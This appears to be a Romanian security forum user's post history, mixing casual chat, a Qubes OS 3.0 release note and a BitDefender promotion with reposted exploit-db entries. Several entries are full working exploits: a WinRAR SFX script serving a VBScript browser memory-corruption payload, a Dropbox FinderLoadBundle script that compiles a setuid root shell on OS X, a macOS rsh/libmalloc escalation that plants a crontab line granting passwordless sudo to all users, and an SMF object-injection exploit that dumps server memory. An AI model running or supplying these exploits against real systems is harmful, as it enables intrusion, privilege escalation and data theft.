Nytro

Din cate stiu eu: The CryptProtectData function performs encryption on the data in a DATA_BLOB structure. Typically, only a user with the same logon credential as the user who encrypted the data can decrypt the data. In addition, the encryption and decryption usually must be done on the same computer. For information about exceptions, see Remarks.

Se poate vedea live, acum.

Thanks. Nu mai merge pe Chrome, insa l-am fixat, dar nu e pus pe GitHub. O sa ii fac update, am mai lucrat la el, dar trebuie sa imi pun o licenta ceva, sa nu am probleme daca il folosesc altii in mod "urat".

Mai e putin.

Probabil foloseste un fuzzer, insa nu le-a descoperit pe toate in 2 zile. Sunt descoperite de-a lungul unei perioade mari, de exemplu un an. Pe exploit-db le-a dat (el sau altcineva) submit la gramada in acea perioada, de aceea apar atunci. Probabil pe issue-urile de pe Project Zero apar mai concret niste date.

Nu cred ca Nils e genul de om care sa cumpere asa ceva. Dar cred ca e genul de om care sa gaseasca asa ceva.

Qubes 3.0 Oct 1, 2015 • Joanna Rutkowska About 5 months after the initial release of Qubes 3.0-rc1, we're now releasing the final 3.0 today! Let me quickly recap the main "killer features" of Qubes OS 3.0 compared to the Release 2: Qubes is now based on what we call Hypervisor Abstraction Layer (HAL), which decouples Qubes logic from the underlying hypervisor. This will allow us to easily switch the underlying hypervisors in the near future, perhaps even during the installation time, depending on the user needs (think tradeoffs between hardware compatibility and performance vs. security properties desired, such as e.g. reduction of covert channels between VMs, which might be of importance to some users). More philosophically-wise, this is a nice manifestation of how Qubes OS is really "not yet another virtualization system", but rather: a user of a virtualization system (such as Xen). We upgraded from Xen 4.1 to Xen 4.4 (now that was really easy thanks to HAL), which allowed for: 1) better hardware compatibility (e.g. UEFI coming soon in 3.1), 2) better performance (e.g. via Xen's libvchan that replaced our vchan). Also, new Qubes qrexec framework that has optimized performance for inter-VM services. We introduced officially supported Debian templates. And finally: we integrated Whonix templates, which optimize Tor workflows for Qubes. As explained in our Release Cycle Documentation (something we finally created and been polishing through this 3.0 branch development), there is almost no new features in 3.0 compared to 3.0-rc1, essentially only bugfixes, intermixed with a few minor improvements. But, while the 3.0 branch was "maturing", and getting bugfixes merged, most of our work has been focused on the 3.1 branch, which is adding a bunch of exciting new features, as indicated on our high-level roadmap, specifically: UEFI support (see this ticket for more info and test images). Live USB edition (preview for which we already released earlier this summer, now it will get merged into the master branch for 3.1) Management/pre-configuration stack: The Big Killer Feature of the upcoming 3.1 release, which will make it easy to provide out of the box configurations for things such as: out of the box Whonix/Tor, or Split GPG, or default USB sandboxing VM, which currently the user must do manually. We're planning to release the first candidate for 3.1 as early as the end of October, actually. But development of any serious project is not just adding new features, although that's admittedly the most exciting thing for any developer to do. In R3 we have finally started implementing this golden thought, and the first tangible outcome of this change of attitude is the automated testing framework which we have been using for all the releases in this 3.0 branch already. We hope this results in much more polished, stable code. Other things we've started to be increasingly prioritizing recently, and only plan to intensify in the coming year are: 1) making Qubes more accessible to people (think easier to get hardware that can run Qubes OS), and 2) easier to use (better UX and UI). I think this is also pretty exciting, actually. As previously announced earlier this summer, we have decided to dedicate this release of Qubes OS to the memory of Caspar Bowden: Caspar has been a proud user, supporter, and advocate for Qubes OS, and also a friend. I think he would have liked that dedication. The Qubes 3.0 ISO can be downloaded from here. We have also released another scheduled Qubes Canary today. I would like to thank all the people who have contributed to this huge effort of creating a new "reasonably secure" desktop OS. I believe we're making together an important and meaningful thing here. Let's keep this going! Sursa: http://blog.invisiblethings.org/2015/10/01/qubes-30.html

[h=1]Windows Kernel - NtGdiBitBlt Buffer Overflow (MS15-097)[/h] Source: https://code.google.com/p/google-security-research/issues/detail?id=474 --- The attached PoC triggers a buffer overflow in the NtGdiBitBlt? system call. It reproduces reliable on Win 7 32-bit with Special Pool enabled on win32k.sys --- Proof of Concept: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38307.zip Sursa: https://www.exploit-db.com/exploits/38307/

[h=1]Adobe Acrobat Reader AFParseDate Javascript API Restrictions Bypass Vulnerability[/h] # Title: Adobe Acrobat Reader AFParseDate Javascript API Restrictions Bypass Vulnerability # Date: 09/28/2015 # Author: Reigning Shells, based off PoC published by Zero Day Initiative # Vendor Homepage: adobe.com # Version: Adobe Reader and Acrobat 10.x before 10.1.14 and 11.x before 11.0.11 on Windows and OS X are vulnerable. # Tested on: Adobe Acrobat 11.0.10 on Windows 7 # CVE : CVE-2015-3073 This vulnerability allows remote attackers to bypass API restrictions on vulnerable installations of Adobe Reader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within AFParseDate. By creating a specially crafted PDF with specific JavaScript instructions, it is possible to bypass the Javascript API restrictions. A remote attacker could exploit this vulnerability to execute arbitrary code. Adobe Reader and Acrobat 10.x before 10.1.14 and 11.x before 11.0.11 on Windows and OS X are vulnerable. Notes: The code assumes you attached a DLL named exploit.txt to the PDF document to get around attachment security restrictions. Acrobat will execute updaternotifications.dll if it's in the same directory as the Acrobat executable or the same directory as the document being opened. Credit for discovery and the initial POC that illustrates code being executed in the privileged context (launching a URL) goes to the Zero Day Initiative. Code: https://github.com/reigningshells/CVE-2015-3073/blob/master/exploit.js https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38344.zip Sursa: https://www.exploit-db.com/exploits/38344/

[h=1]WinRar 5.21 - SFX OLE Command Execution[/h] #!/usr/bin/python -w # Title : WinRar SFX OLE Command Execution # Date : 25/09/2015 # Author : R-73eN # Tested on : Windows Xp SP3 with WinRAR 5.21 # # Triggering the Vulnerability # Run this python script # Right click a file and then click on add to archive. # check the 'Create SFX archive' box # go to Advanced tab # go to SFX options # go to Text And icon # copy the code that the script will generate to 'Text to display into sfx windows' # Click OK two times and the sfx archive is generated. # If someone opens that sfx archive a calculator should pop up. # # Video : https://youtu.be/vIslLJYvnaM # banner = "" banner +=" ___ __ ____ _ _ \n" banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n" banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n" banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n" banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n" print banner import socket CRLF = "\r\n" #OLE command execution exploit = """<html> <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" > <head> </head> <body> <SCRIPT LANGUAGE="VBScript"> function runmumaa() On Error Resume Next set shell=createobject("Shell.Application") shell.ShellExecute "calc.exe", "runas", 0 end function </script> <SCRIPT LANGUAGE="VBScript"> dim aa() dim ab() dim a0 dim a1 dim a2 dim a3 dim win9x dim intVersion dim rnda dim funclass dim myarray Begin() function Begin() On Error Resume Next info=Navigator.UserAgent if(instr(info,"Win64")>0) then exit function end if if (instr(info,"MSIE")>0) then intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2)) else exit function end if win9x=0 BeginInit() If Create()=True Then myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00) myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0) if(intVersion<4) then document.write("<br> IE") document.write(intVersion) runshellcode() else setnotsafemode() end if end if end function function BeginInit() Randomize() redim aa(5) redim ab(5) a0=13+17*rnd(6) a3=7+3*rnd(5) end function function Create() On Error Resume Next dim i Create=False For i = 0 To 400 If Over()=True Then Create=True Exit For End If Next end function sub testaa() end sub function mydata() On Error Resume Next i=testaa i=null redim Preserve aa(a2) ab(0)=0 aa(a1)=i ab(0)=6.36598737437801E-314 aa(a1+2)=myarray ab(2)=1.74088534731324E-310 mydata=aa(a1) redim Preserve aa(a0) end function function setnotsafemode() On Error Resume Next i=mydata() i=rum(i+8) i=rum(i+16) j=rum(i+&h134) for k=0 to &h60 step 4 j=rum(i+&h120+k) if(j=14) then j=0 redim Preserve aa(a2) aa(a1+2)(i+&h11c+k)=ab(4) redim Preserve aa(a0) j=0 j=rum(i+&h120+k) Exit for end if next ab(2)=1.69759663316747E-313 runmumaa() end function function Over() On Error Resume Next dim type1,type2,type3 Over=False a0=a0+a3 a1=a0+2 a2=a0+&h8000000 redim Preserve aa(a0) redim ab(a0) redim Preserve aa(a2) type1=1 ab(0)=1.123456789012345678901234567890 aa(a0)=10 If(IsObject(aa(a1-1)) = False) Then if(intVersion<4) then mem=cint(a0+1)*16 j=vartype(aa(a1-1)) if((j=mem+4) or (j*8=mem+8)) then if(vartype(aa(a1-1))<>0) Then If(IsObject(aa(a1)) = False ) Then type1=VarType(aa(a1)) end if end if else redim Preserve aa(a0) exit function end if else if(vartype(aa(a1-1))<>0) Then If(IsObject(aa(a1)) = False ) Then type1=VarType(aa(a1)) end if end if end if end if If(type1=&h2f66) Then Over=True End If If(type1=&hB9AD) Then Over=True win9x=1 End If redim Preserve aa(a0) end function function rum(add) On Error Resume Next redim Preserve aa(a2) ab(0)=0 aa(a1)=add+4 ab(0)=1.69759663316747E-313 rum=lenb(aa(a1)) ab(0)=0 redim Preserve aa(a0) end function </script> </body> </html>""" response = "HTTP/1.1 200 OK" + CRLF + "Content-Type: text/html" + CRLF + "Connection: close" + CRLF + "Server: Apache" + CRLF + "Content-Length: " + str(len(exploit)) + CRLF + CRLF + exploit + CRLF sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) host = raw_input(" Enter Local IP: ") server_address = (host, 8080) sock.bind(server_address) print "[+] Server started " + host + " [+]" sock.listen(1) print "[+] Insert this code on the 'Text to display into sfx windows' [+]" print "\n<iframe src='http://" + host + ":8080/'> </iframe>" print "\n[+] Waiting for request . . . [+]" connection, client_address = sock.accept() while True: connection.recv(2048) print "[+] Got request , sending exploit . . .[+]" connection.send(exploit) print "[+] Exploit sent , A calc should pop up . . [+]" print "\nhttps://www.infogen.al/\n" exit(0) Sursa: https://www.exploit-db.com/exploits/38319/

[h=1]Dropbox < 3.3.x - OSX FinderLoadBundle Local Root Exploit[/h] #!/bin/bash # Exploit Title: Dropbox FinderLoadBundle OS X local root exploit # Google Dork: N/A # Date: 29/09/15 # Exploit Author: cenobyte # Vendor Homepage: https://www.dropbox.com # Software Link: N/A # Version: Dropbox 1.5.6, 1.6-7.*, 2.1-11.*, 3.0.*, 3.1.*, 3.3.* # Tested on: OS X Yosemite (10.10.5) # CVE: N/A # # Dropbox FinderLoadBundle OS X local root exploit by cenobyte 2015 # <vincitamorpatriae@gmail.com> # # - vulnerability description: # The setuid root FinderLoadBundle that was included in older DropboxHelperTools # versions for OS X allows loading of dynamically linked shared libraries # that are residing in the same directory. The directory in which # FinderLoadBundle is located is owned by root and that prevents placing # arbitrary files there. But creating a hard link from FinderLoadBundle to # somewhere in a directory in /tmp circumvents that protection thus making it # possible to load a shared library containing a payload which creates a root # shell. # # - vulnerable versions: | versions not vulnerable: # Dropbox 3.3.* for Mac | Dropbox 3.10.* for Mac # Dropbox 3.1.* for Mac | Dropbox 3.9.* for Mac # Dropbox 3.0.* for Mac | Dropbox 3.8.* for Mac # Dropbox 2.11.* for Mac | Dropbox 3.7.* for Mac # Dropbox 2.10.* for Mac | Dropbox 3.6.* for Mac # Dropbox 2.9.* for Mac | Dropbox 3.5.* for Mac # Dropbox 2.8.* for Mac | Dropbox 3.4.* for Mac # Dropbox 2.7.* for Mac | Dropbox 3.2.* for Mac # Dropbox 2.6.* for Mac | Dropbox 1.5.1-5 for Mac # Dropbox 2.5.* for Mac | Dropbox 1.4.* for Mac # Dropbox 2.4.* for Mac | Dropbox 1.3.* for Mac # Dropbox 2.3.* for Mac | # Dropbox 2.2.* for Mac | # Dropbox 2.1.* for Mac | # Dropbox 1.7.* for Mac | # Dropbox 1.6.* for Mac | # Dropbox 1.5.6 for Mac | # # The vulnerability was fixed in newer DropboxHelperTools versions as of 3.4.*. # However, there is no mention of this issue at the Dropbox release notes: # https://www.dropbox.com/release_notes # # It seems that one of the fixes implemented in FinderLoadBundle is a # check whether the path of the bundle is a root owned directory making it # impossible to load arbitrary shared libraries as a non-privileged user. # # I am not sure how to find the exact version of the FinderLoadBundle executable # but the included Info.plist contained the following key: # <key>CFBundleShortVersionString</key> # This key is no longer present in the plist file of the latest version. So I # included a basic vulnerable version checker that checks for the presence of # this key. # # - exploit details: # I wrote this on OS X Yosemite (10.10.5) but there are no OS specific features # used. This exploit relies on Xcode for the shared library + root shell to be # compiled. After successful exploitation a root shell is left in a directory in # /tmp so make sure you delete it on your own system when you are done testing. # # - example: # $ ./dropboxfinderloadbundle.sh # Dropbox FinderLoadBundle OS X local root exploit by cenobyte 2015 # # [-] creating temporary directory: /tmp/c7a15893fc1b28d31071c16c6663cbf3 # [-] linking /Library/DropboxHelperTools/Dropbox_u501/FinderLoadBundle # [-] constructing bundle # [-] creating /tmp/c7a15893fc1b28d31071c16c6663cbf3/boomsh.c # [-] compiling root shell # [-] executing FinderLoadBundle using root shell payload # [-] entering root shell # bash-3.2# id -P # root:********:0:0::0:0:System Administrator:/var/root:/bin/sh readonly __progname=$(basename $0) errx() { echo "$__progname: $@" >&2 exit 1 } main() { local -r tmp=$(head -10 /dev/urandom | md5) local -r helpertools="/Library/DropboxHelperTools" local -r bundle="/tmp/$tmp/mach_inject_bundle_stub.bundle/Contents/MacOS" local -r bundletarget="$bundle/mach_inject_bundle_stub" local -r bundlesrc="${bundletarget}.c" local -r sh="/tmp/$tmp/boomsh" local -r shsrc="${sh}.c" local -r cfversion="CFBundleShortVersionString" local -r findbin="FinderLoadBundle" echo "Dropbox $findbin OS X local root exploit by cenobyte 2015" echo uname -v | grep -q ^Darwin || \ errx "this Dropbox exploit only works on OS X" [ ! -d "$helpertools" ] && \ errx "$helpertools does not exist" which -s gcc || \ errx "gcc not found" found=0 for finder in $(ls $helpertools/Dropbox_u*/$findbin); do stat -s "$finder" | grep -q "st_mode=0104" if [ $? -eq 0 ]; then found=1 break fi done [ $found -ne 1 ] && \ errx "couldn't find a setuid root $findbin" local -r finderdir=$(dirname $finder) local -r plist="${finderdir}/DropboxBundle.bundle/Contents/Info.plist" [ -f "$plist" ] || \ errx "FinderLoadBundle not vulnerable (cannot open $plist)" grep -q "<key>$cfversion</key>" "$plist" || \ errx "FinderLoadBundle not vulnerable (plist missing $cfversion)" echo "[-] creating temporary directory: /tmp/$tmp" mkdir /tmp/$tmp || \ errx "couldn't create /tmp/$tmp" echo "[-] linking $finder" ln "$finder" "/tmp/$tmp/$findbin" || \ errx "ln $finder /tmp/$tmp/$findbin failed" echo "[-] constructing bundle" mkdir -p "$bundle" || \ errx "cannot create $bundle" echo "#include <sys/stat.h>" > "$bundlesrc" echo "#include <sys/types.h>" >> "$bundlesrc" echo "#include <stdlib.h>" >> "$bundlesrc" echo "#include <unistd.h>" >> "$bundlesrc" echo "extern void init(void) __attribute__ ((constructor));" >> "$bundlesrc" echo "void init(void)" >> "$bundlesrc" echo "{" >> "$bundlesrc" echo " setuid(0);" >> "$bundlesrc" echo " setgid(0);" >> "$bundlesrc" echo " chown(\"$sh\", 0, 0);" >> "$bundlesrc" echo " chmod(\"$sh\", S_ISUID|S_IRWXU|S_IXGRP|S_IXOTH);" >> "$bundlesrc" echo "}" >> "$bundlesrc" echo "[-] creating $shsrc" echo "#include <unistd.h>" > "$shsrc" echo "#include <stdio.h>" >> "$shsrc" echo "#include <stdlib.h>" >> "$shsrc" echo "int" >> "$shsrc" echo "main()" >> "$shsrc" echo "{" >> "$shsrc" echo " setuid(0);" >> "$shsrc" echo " setgid(0);" >> "$shsrc" echo " system(\"/bin/bash\");" >> "$shsrc" echo " return(0);" >> "$shsrc" echo "}" >> "$shsrc" echo "[-] compiling root shell" gcc "$shsrc" -o "$sh" || \ errx "gcc failed for $shsrc" gcc -dynamiclib -o "$bundletarget" "$bundlesrc" || \ errx "gcc failed for $bundlesrc" echo "[-] executing $findbin using root shell payload" cd "/tmp/$tmp" ./$findbin mach_inject_bundle_stub.bundle 2>/dev/null 1>/dev/null [ $? -ne 4 ] && \ errx "exploit failed, $findbin seems not vulnerable" [ ! -f "$sh" ] && \ errx "$sh was not created, exploit failed" stat -s "$sh" | grep -q "st_mode=0104" || \ errx "$sh was not set to setuid root, exploit failed" echo "[-] entering root shell" "$sh" } main "$@" exit 0 Sursa: https://www.exploit-db.com/exploits/38360/

[h=1]Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation[/h] # CVE-2015-5889: issetugid() + rsh + libmalloc osx local root # tested on osx 10.9.5 / 10.10.5 # jul/2015 # by rebel import os,time,sys env = {} s = os.stat("/etc/sudoers").st_size env['MallocLogFile'] = '/etc/crontab' env['MallocStackLogging'] = 'yes' env['MallocStackLoggingDirectory'] = 'a\n* * * * * root echo "ALL ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers\n\n\n\n\n' sys.stderr.write("creating /etc/crontab..") p = os.fork() if p == 0: os.close(1) os.close(2) os.execve("/usr/bin/rsh",["rsh","localhost"],env) time.sleep(1) if "NOPASSWD" not in open("/etc/crontab").read(): sys.stderr.write("failed\n") sys.exit(-1) sys.stderr.write("done\nwaiting for /etc/sudoers to change (<60 seconds)..") while os.stat("/etc/sudoers").st_size == s: sys.stderr.write(".") time.sleep(1) sys.stderr.write("\ndone\n") os.system("sudo su") Sursa: https://www.exploit-db.com/exploits/38371/

Da, ne-am gandit si noi la o parte dintre ele, dar nu stiu cine ar avea timp de asa ceva...

Cine face cate un topic pentru fiecare (care nu exista deja)?

Le-am cautat si eu pe cele de la Defcon, dar nu le-am gasit. Recomand tuturor: "When IoT Attacks: Hacking A Linux-Powered Rifle"! E fun. Vrei root pe o arma? Vezi video.

Am vazut aseara doua dintre ele: 1. Red Team vs Blue Team - Trebuie vazut! 2. Bypass Control Flow Guard - Continut bun, prezentare de cacat. Engleza chinezului ala e mai prosta chiar si decat a mea.

Cum de au aparut asa repede? Sa le descarc, pana nu le sterg (nefiind uploadate de catre staff)?

[h=1]SMF (Simple Machine Forum) <= 2.0.10 - Remote Memory Exfiltration Exploit[/h] #!/usr/bin/python# -*- coding: iso-8859-15 -*- ############################################################################# # Title: SMF (Simple Machine Forum) <= 2.0.10 Remote Memory Exfiltration Exploit # Authors: Andrea Palazzo # <andrea [dot] palazzo [at] truel [dot] it> # Filippo Roncari # <filippo [dot] roncari [at] truel [dot] it> # Truel Lab ~ http://lab.truel.it # Requirements: SMF <= 2.0.10 # PHP <= 5.6.11 / 5.5.27 / 5.4.43 # Advisories: TL-2015-PHP04 http://lab.truel.it/d/advisories/TL-2015-PHP04.txt # TL-2015-PHP06 http://lab.truel.it/d/advisories/TL-2015-PHP06.txt # TL-2015-SMF01 n/y/a # Details: http://lab.truel.it/2015/09/php-object-injection-the-dirty-way/ # Demo: https://www.youtube.com/watch?v=dNRXTt7XQxs ############################################################################ import sys, requests, time, os, socket, thread, base64, string, urllib from multiprocessing import Process #Payload Config bytes_num = 000 #num of bytes to dump address = 000 #starting memory address #Target Config cookie = {'PHPSESSID' : '000'} #SMF session cookie target_host = 'http://localhost/smf/index.php' #URL of target installation index.php csrftoken = '' #Local Server Config host = "localhost" port = 31337 #Memory dump variables dumped = '' current_dump = '' in_string = False brute_index = 0 brute_list = list(string.ascii_letters + string.digits) r_ok = 'HTTP/1.0 200 OK' + '\n' r_re = 'HTTP/1.0 302 OK' + '\n' r_body = '''Server: Truel-Server Content-Type: text/xml Connection: keep-alive Content-Length: 395 <env:Envelope xmlns:env="http://www.w3.org/2003/05/soap-envelope"> <env:Header> <n:alertcontrol xmlns:n="http://example.org/alertcontrol"> <n:priority>1</n:priority> <n:expires>2001-06-22T14:00:00-05:00</n:expires> </n:alertcontrol> </env:Header> <env:Body> <m:alert xmlns:m="http://example.org/alert"> <m:msg>Truel</m:msg> </m:alert> </env:Body> </env:Envelope>''' def serverStart(): print "[+] Setting up local server on port " + str(port) sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) if not sock: print "[X] Fatal Error: Unable to create socket" sock.bind((host, port)) sock.listen(1) return sock def getToken(): global csrftoken print "[+] Trying to get a valid CSRF token" for n in range(3): #3 attempts r = requests.get(target_host, cookies=cookie, allow_redirects=False) r = r.text if(r.find("action=logout;")!=-1): break start = r.find("action=logout;") if (start !=-1): end = (r[start+14:]).find('">') csrftoken = r[start+14 : start+end+14] print "[+] Authentication done. Got token " + str(csrftoken) return True else: print "[X] Fatal Error: You are not authenticated. Check the provided PHPSESSID." return False def prepareForExploit(): if not(getToken()): #get CSRF token os._exit(1) target = target_host + '?action=suggest&' + csrftoken + '&search_param=test' r = requests.get(target, cookies=cookie, allow_redirects=False) #necessary request return def forgePayload(current_try, address): location = "http://" + current_try payload = 'O:12:"DateInterval":1:{s:14:"special_amount";O:9:"Exception":1:{s:19:"\x00Exception\x00previous";O:10:"SoapClient":5:{s:3:"uri";s:1:"a";s:8:"location";s:' + str(len(location)) + ':"' + location + '";s:8:"_cookies";a:1:{s:5:"owned";a:3:{i:0;s:1:"a";i:2;i:' + str(address) + ';i:1;i:' + str(address) + ';}}s:11:"_proxy_host";s:' + str(len(host)) + ':"' + str(host) + '";s:11:"_proxy_port";i:' + str(port) + ';}}}' return payload def sendPayload(payload,null): target = target_host + '?action=suggest&' + csrftoken + '&search_param=' + (base64.b64encode(payload)) #where injection happens try: r = requests.get(target, cookies=cookie, allow_redirects=False) except requests.exceptions.RequestException: print "[X] Fatal Error: Unable to reach the remote host (Connection Refuse)" os._exit(1) return def limitReached(dumped): if(len(dumped) >= bytes_num): return True else: return False def printDumped(dumped): d = " " cnt = 1 print "[+] " + str(len(dumped)) + " bytes dumped from " + target_host print "[+] ======================= Dumped Data =======================" for i in range(bytes_num): d = d + str(dumped[i]) if (cnt % 48 == 0): print d d = " " if (cnt == bytes_num): print d cnt = cnt + 1 def getSoapRequest(sock): connection, sender = sock.accept() request = connection.recv(8192) return (connection, request) def sendSoapResponse(connection, content): connection.send(content) connection.close() return def getDumpedFromHost(request): i = request.find("Host: ") + 6 v = request[i:i+1] return v def pushDumped(value, string): global dumped global current_dump global brute_index global address global in_string dumped = str(value) + str(dumped) if(string): current_dump = str(value) + str(current_dump) else: current_dump = "" in_string = string address = address-1 brute_index = 0 print "[" + hex(address) + "] " + str(value) return def bruteViaResponse(sock): global brute_index current_try = "" response_ok = r_ok + r_body for n in range(19): connection, request = getSoapRequest(sock) if not request: connection.close() return False if request.find("owned")!=-1: pushDumped(getDumpedFromHost(request), True) sendSoapResponse(connection,response_ok) return True else: if((brute_index+1) == len(brute_list)): sendSoapResponse(connection,response_ok) return False brute_index = brute_index + 1 if not in_string: current_try = brute_list[brute_index] else: current_try = brute_list[brute_index] + str(current_dump) response_re = r_re + 'Location: http://' + str(current_try) + '\n' + r_body sendSoapResponse(connection,response_re) connection, request = getSoapRequest(sock) if request.find("owned")!=-1: pushDumped(getDumpedFromHost(request), True) sendSoapResponse(connection,response_ok) return True sendSoapResponse(connection,response_ok) return False def bruteViaRequest(sock): global brute_index brute_index = 0 current_try = "" while(True): if(brute_index == len(brute_list)): pushDumped(".", False) if limitReached(dumped): printDumped(dumped) return if not in_string: current_try = brute_list[brute_index] else: current_try = brute_list[brute_index] + str(current_dump) payload = forgePayload(current_try,address) thread.start_new_thread(sendPayload,(payload,"")) if not bruteViaResponse(sock): brute_index = brute_index + 1 return def runExploit(): print "[+] Starting exploit" sock = serverStart() prepareForExploit() print "[+] Trying to dump " + str(bytes_num) + " bytes from " + str(target_host) bruteViaRequest(sock) sock.close() print "[+] Bye ~ Truel Lab (http://lab.truel.it)" sys.exit(0) runExploit() Sursa: https://www.exploit-db.com/exploits/38304/

LinkOfDeath.com - when it will catch you it will kill you('r tab)

Lu ala cu vn5socks m-am plictisit de cate ori i-am dat ban si l-am lasat sa faca spam intr-un topic Edit: Le-am dat ban, dar parca vad peste 2-3 ore din nou posturi . Eh, cel putin ajuta la SEO. Cred.

BitDefender Internet Security 2016 – 6 luni licenta GRATUITA! By Radu FaraVirusi(com) on September 21, 2015 BitDefender a lansat gamei de produse BitDefender 2016, ce aduce cateva modificari notabile. Acum puteti avea licenta GRATUITA timp de 6 luni de zile pentru produsul BitDefender Internet Security 2016. A fost adaugata protectie impotriva programelor malitioase de tip ransomware (care blocheaza PC-ul si cer o rascumparare in bani pentru deblocare) – asigura un scut impotriva accesului aplicatiilor necunoscute la documentele personale. Motorul BitDefender a fost imbunatatit cu o tehnologie denumita “machine learning-based technologies”, permitandu-i sa detecteze amenintari noi mai repede ca niciodata. Firewall-ul a fost rescris si are o performanta imbunatatita. Au fost aduse modificari si modulelor password manager, control parental, criptarea fisierelor si utilitarelor anti furt. Pentru a obtine licenta GRATUITA accesati site-ul: Get 6 Months Free Of Bitdefender! The Best Protection Against Cyber-Threats. Sursa: BitDefender Internet Security 2016 – 6 luni licenta GRATUITA!

Sa ne spui si noua daca afli mai multe despre evenimentul de la CERT. O sa fie tehnic? Eu cred ca o sa fie de "informare generala". Cel de la Provision se poate descrie intr-un singur cuvant: SALES. Owasp o sa fie interesant.

Da, nu se merita. Nu e pentru noi.

9:2 A Sermon on Newton and Turing 9:3 Globalstar Satellite Communications 9:4 Keenly Spraying the Kernel Pools 9:5 The Second Underhanded Crypto Contest 9:6 Cross VM Communications 9:7 Antivirus Tumors 9:8 A Recipe for TCP/IPA 9:9 Mischief with AX.25 and APRS 9:10 Napravi i ti Ra?cunar „Galaksija“ 9:11 Root Rights are a Grrl’s Best Friend! 9:12 What If You Could Listen to This PDF? 9:13 Oona’s Puzzle Corner! Link: https://www.alchemistowl.org/pocorgtfo/pocorgtfo09.pdf

Android 5.x Lockscreen Bypass (CVE-2015-3860) Posted on September 15, 2015 by jgor A vulnerability exists in Android 5.x <= 5.1.1 (before build LMY48M) that allows an attacker to crash the lockscreen and gain full access to a locked device, even if encryption is enabled on the device. By manipulating a sufficiently large string in the password field when the camera app is active an attacker is able to destabilize the lockscreen, causing it to crash to the home screen. At this point arbitrary applications can be run or adb developer access can be enabled to gain full access to the device and expose any data contained therein. September 2015: Elevation of Privilege Vulnerability in Lockscreen (CVE-2015-3860) The attack requires the following criteria: Attacker must have physical access to the device User must have a password set (pattern / pin configurations do not appear to be exploitable) Proof-of-concept – Nexus 4 factory image 5.1.1 (build LMY48I): Sursa: Android 5.x Lockscreen Bypass (CVE-2015-3860) | UT Austin Information Security Office